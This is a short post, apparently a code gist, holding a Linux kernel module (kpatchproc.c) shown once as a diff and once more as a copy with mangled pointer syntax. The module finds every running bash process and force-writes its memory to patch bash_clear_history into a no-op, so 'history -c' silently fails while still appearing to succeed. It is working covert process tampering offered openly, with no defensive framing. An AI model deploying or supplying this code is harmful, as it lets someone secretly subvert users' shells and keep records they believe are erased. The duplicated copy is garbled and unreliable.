linuxthor · September 8, 2020 15:29
diff --git a/kpatchproc.c b/kpatchproc.c
 #include <linux/module.h>
 #include <linux/init.h>
 #include <linux/kernel.h>
 #include <linux/fs.h>
 #include <linux/mm.h>
 #include <linux/uio.h>  
 #include <linux/slab.h>
 #include <linux/vmalloc.h>
 #include <linux/kallsyms.h>
 #include <linux/uaccess.h>
 #include <linux/sched/task.h>

 int init_module(void)
 { 
    int x;
    int pmd = PID_MAX_DEFAULT; 
    struct task_struct *ts; 
    char tsk[TASK_COMM_LEN]; 
    struct mm_struct *emem;
    void *yabba;
    static int (*arvm)(struct task_struct *tsk, struct mm_struct *mm, unsigned long addr, void *buf, int len, int write);

    char patch[4] = {0xc3, 0x90, 0x90, 0x90}; 

    for(x = 2; x < pmd; x++)
    {
       ts = pid_task(find_vpid(x), PIDTYPE_PID); 
       if(ts != 0)
       {
           get_task_comm(tsk, ts);
           if(strcmp(ts->comm, "bash") == 0)
           {
               printk("Process found\n");
               task_lock(ts);

               emem = ts->mm; 

               printk("Code is at %px-%px\n", (void *)emem->start_code, (void *)emem->end_code);
               yabba = kmalloc((emem->end_code - emem->start_code), GFP_KERNEL);

               // yeah.. __access_remote_vm is just one way to do this..(!)
               arvm = (void *)kallsyms_lookup_name("__access_remote_vm");
               arvm(ts, emem, emem->start_code, yabba, (emem->end_code - emem->start_code), FOLL_FORCE);

               // we access some function using a
               // hardcoded offset (or could search for it etc..) 
               memcpy(yabba + 0x78ec0, patch, 4); 
               // 0000000000078ec0 <bash_clear_history@@Base>:
               // patching the function makes it a no-op so history -c broken 
                // in ye running bash processes signals success.. 
             
               arvm(ts, emem, emem->start_code, yabba, (emem->end_code - emem->start_code), FOLL_FORCE | FOLL_WRITE);
               kfree(yabba);
               task_unlock(ts);
           }
       }
    }
    return 0;
 }

 void cleanup_module(void)
 {      
 }

 MODULE_AUTHOR("linuxthor");
 MODULE_LICENSE("GPL");
	#include <linux/module.h>
	#include <linux/init.h>
	#include <linux/kernel.h>
	#include <linux/fs.h>
	#include <linux/mm.h>
	#include <linux/uio.h>
	#include <linux/slab.h>
	#include <linux/vmalloc.h>
	#include <linux/kallsyms.h>
	#include <linux/uaccess.h>
	#include <linux/sched/task.h>

	int init_module(void)
	{
	int x;
	int pmd = PID_MAX_DEFAULT;
	struct task_struct *ts;
	char tsk[TASK_COMM_LEN];
	struct mm_struct *emem;
	void *yabba;
	static int (arvm)(struct task_struct tsk, struct mm_struct mm, unsigned long addr, void buf, int len, int write);

	char patch[4] = {0xc3, 0x90, 0x90, 0x90};

	for(x = 2; x < pmd; x++)
	{
	ts = pid_task(find_vpid(x), PIDTYPE_PID);
	if(ts != 0)
	{
	get_task_comm(tsk, ts);
	if(strcmp(ts->comm, "bash") == 0)
	{
	printk("Process found\n");
	task_lock(ts);

	emem = ts->mm;

	printk("Code is at %px-%px\n", (void )emem->start_code, (void )emem->end_code);
	yabba = kmalloc((emem->end_code - emem->start_code), GFP_KERNEL);

	// yeah.. __access_remote_vm is just one way to do this..(!)
	arvm = (void *)kallsyms_lookup_name("__access_remote_vm");
	arvm(ts, emem, emem->start_code, yabba, (emem->end_code - emem->start_code), FOLL_FORCE);

	// we access some function using a
	// hardcoded offset (or could search for it etc..)
	memcpy(yabba + 0x78ec0, patch, 4);
	// 0000000000078ec0 <bash_clear_history@@Base>:
	// patching the function makes it a no-op so history -c broken
	// in ye running bash processes signals success..

	arvm(ts, emem, emem->start_code, yabba, (emem->end_code - emem->start_code), FOLL_FORCE \| FOLL_WRITE);
	kfree(yabba);
	task_unlock(ts);
	}
	}
	}
	return 0;
	}

	void cleanup_module(void)
	{
	}

	MODULE_AUTHOR("linuxthor");
	MODULE_LICENSE("GPL");